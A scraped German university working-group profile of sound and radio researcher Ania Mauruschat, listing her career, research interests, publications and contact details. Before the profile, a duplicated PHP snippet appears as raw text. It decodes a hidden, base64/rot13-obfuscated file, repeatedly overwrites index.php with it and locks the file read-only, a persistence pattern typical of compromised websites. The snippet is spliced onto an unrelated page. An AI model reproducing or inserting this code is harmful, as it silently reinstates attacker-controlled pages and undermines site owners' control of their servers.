$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } $i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Ania Mauruschat – Auditive Medienkulturen

Ania Mauruschat

Ania ist ausgebildete Redakteurin sowie medienkulturwissenschaftliche Sound- und Radioforscherin. Sie promovierte am Collegium Helveticum in Zürich und am Englischen Seminar der Universität Basel zur Ästhetik der Störung im Hörspiel (AT: „Radiophonie, Störung und Erkenntnis. Zur Epistemologie der Radiokunst“). Außerdem arbeitete nebenbei sie als Moderatorin und Autorin für die Redaktion Hörspiel & Medienkunst des Bayerischen Rundfunks sowie für andere Radiosender in der Schweiz und in Deutschland. Seit September 2021 erforscht sie als Marie-Curie-Fellow der Europäischen Kommission am Sound Studies Lab in Kopenhagen ihr PostDoc-Projekt “Sounding Crisis”.

Als Sprecherin der AG (10/2017 – 09/2021) war es ihr zentrales Anliegen für Forschung zu auditiver Kultur und Sound Studies neue Publikationsmöglichkeiten zu erschließen – natürlich nicht nur für Texte sondern v.a. auch für Audioformate. Das Resultat war die Lancierung des AG-Podcast “Sounds of Sound Studies. Der Wissenschaftspodcast zu Auditiven Medienkulturen” und die Koordination der ersten Staffel “Zurück in die Zukunft: Zur Vergangenheit, Gegenwart und Zukunft akustischer Forschung”.

Kurzbio

  • seit 09/2021 Marie Curie-Research Fellow am Sound Studies Lab der Universität Kopenhagen mit dem Forschungsprojekt “Sounding Crisis”
  • seit 01/2018 Mitglied des Promotionsprogramms “Epistemologien ästhetischer Praktiken”, Collegium Helveticum Zürich
  • 10/2017 – 09/2021 Sprecherin der AG Auditive Kultur und Sound Studies
  • 01/2017 – 03/2017 Gastforscherin an der Macquarie University in Sydney, Australien
  • seit 08/2015 Promotion am Englischen Seminar der Universität Basel
  • seit 02/2014 Autorin, Moderatorin, Dozentin in der Schweiz und Deutschland (u.a. SRF2 Kultur, Bayerischer Rundfunk, Deutschlandfunk Kultur; Staatliche Hochschule für Gestaltung Karlsruhe, Zürcher Hochschule der Künste, Universität Basel)
  • 06/2013 – 01/2014 Projektmanagerin des bi-nationalen und interdisziplinären Forschungsantrags „Radiophonic Cultures“, Seminar für Medienwissenschaft der Universität Basel
  • 01/2012 – 07/2013 Wiss. Assistentin für Medienästhetik, Seminar für Medienwissenschaft Universität Basel
  • 2002 – 2012 Radiojournalistin
  • 1995 – 2002 Ausbildung zur Redakteurin an der Deutschen Journalistenschule und Studium der Diplom-Journalistik (Kommunikationswissenschaft, Politik, Soziologie) sowie Germanistik, Theaterwissenschaft und Amerikanistik an der Ludwig-Maximilians-Universität in München.

Forschungsinteressen

  • Sound & Radio Studies
  • Noise
  •  Hörspiel/Feature/Podcast
  •  Epistemologien ästhetischer Praktiken
  •  Medienökologie & Energy Humanities

Aktivitäten

Auf meiner persönlichen Website blogge ich u.a. über meine akustischen Feldforschungen, z.B. in Australien. Lesen und hören kann man das hier.

Publikationen

Aufsätze (Auswahl)

Aufsätze in Sammelbänden

Mauruschat, Ania: An die, die dies hören: Ein Hinweis auf den Ohr-Mundverbund, den Ohr- Ohrverbund, den Ohr-Hirnverbund, in: Ullrich, Wolfgang; Wiesing, Lambert (Hg.): Grosse Sätze machen. Über Bazon Brock, Paderborn 2016, S. 85-94.

Mauruschat, Ania: Noise, Soundplay, Extended Radio. A case study of Bugs & Beats & Beasts by Andreas Ammer and Console as an example of German Hörspiel as a radiophonic art from, in: Oliveira, Madalena; Stachyra, Grazyna; Starkey, Guy (Hg.): Radio: The Resilient Medium – Papers from the Third Conference of the ECREA Radio Research Section, Sunderland 2014.

Mauruschat, Ania; Wimmer, Jeffrey: Indymedia – A people’s CNN, in: Geiselberger, Heinrich (Hg.): Und jetzt? Politik, Protest und Propaganda, Frankfurt am Main 2011, S. 312-322.

Zeitschriftenaufsätze

Mauruschat, Ania: Ruído, peça sonora, rádio extendido: um estudo de caso de bugs & beats & beasts por Andreas Ammer e console, um exemplo de resiliência do Hörspiel alemão como forma de arte radiofônica, in: Polêm!ca , 2014, H. 2, S. Online.

Mauruschat, Ania: Essay: Von der Radiotheorie zum Web 2.0? in: Dreigroschenheft. Informationen zu Bertold Brecht , 2009, H. 3, S. 21-25.

Rezensionen

Mauruschat, Ania: [Rezension von] Solveig Ottmann: Im Anfang war das Experiment. Das Weimarer Radio bei Hans Flesch und Ernst Schoen, Berlin (Kadmos) 2013, in: Zeitschrift für Medienwissenschaft , 2016, S. online.

Mauruschat, Ania: „QuellCodes“. Räume, Quellen und Formatierung aktueller Rundfunkgeschichtsforschung, in: H-Soz-Kult , 2016, S. Online.

Kontakt

Ania Mauruschat, Dipl.-Journ. 

Marie-Curie-Research Fellow

Department of Arts and Cultural Studies

Faculty of Humanities, University of Copenhagen

Karen Blixens Vej 2, Office 16.4.22

DK-2300 Copenhagen S

ania.mauruschat[at]hum.ku.dk

Website des Forschungsprojektes “Sounding Crisis”: https://soundingcrisis.eu

https://aniamauruschat.de
https://engsem.unibas.ch/department/people/staff/profile/profile/person/mauruschat-1/ https://unibasel.academia.edu/AniaMauruschat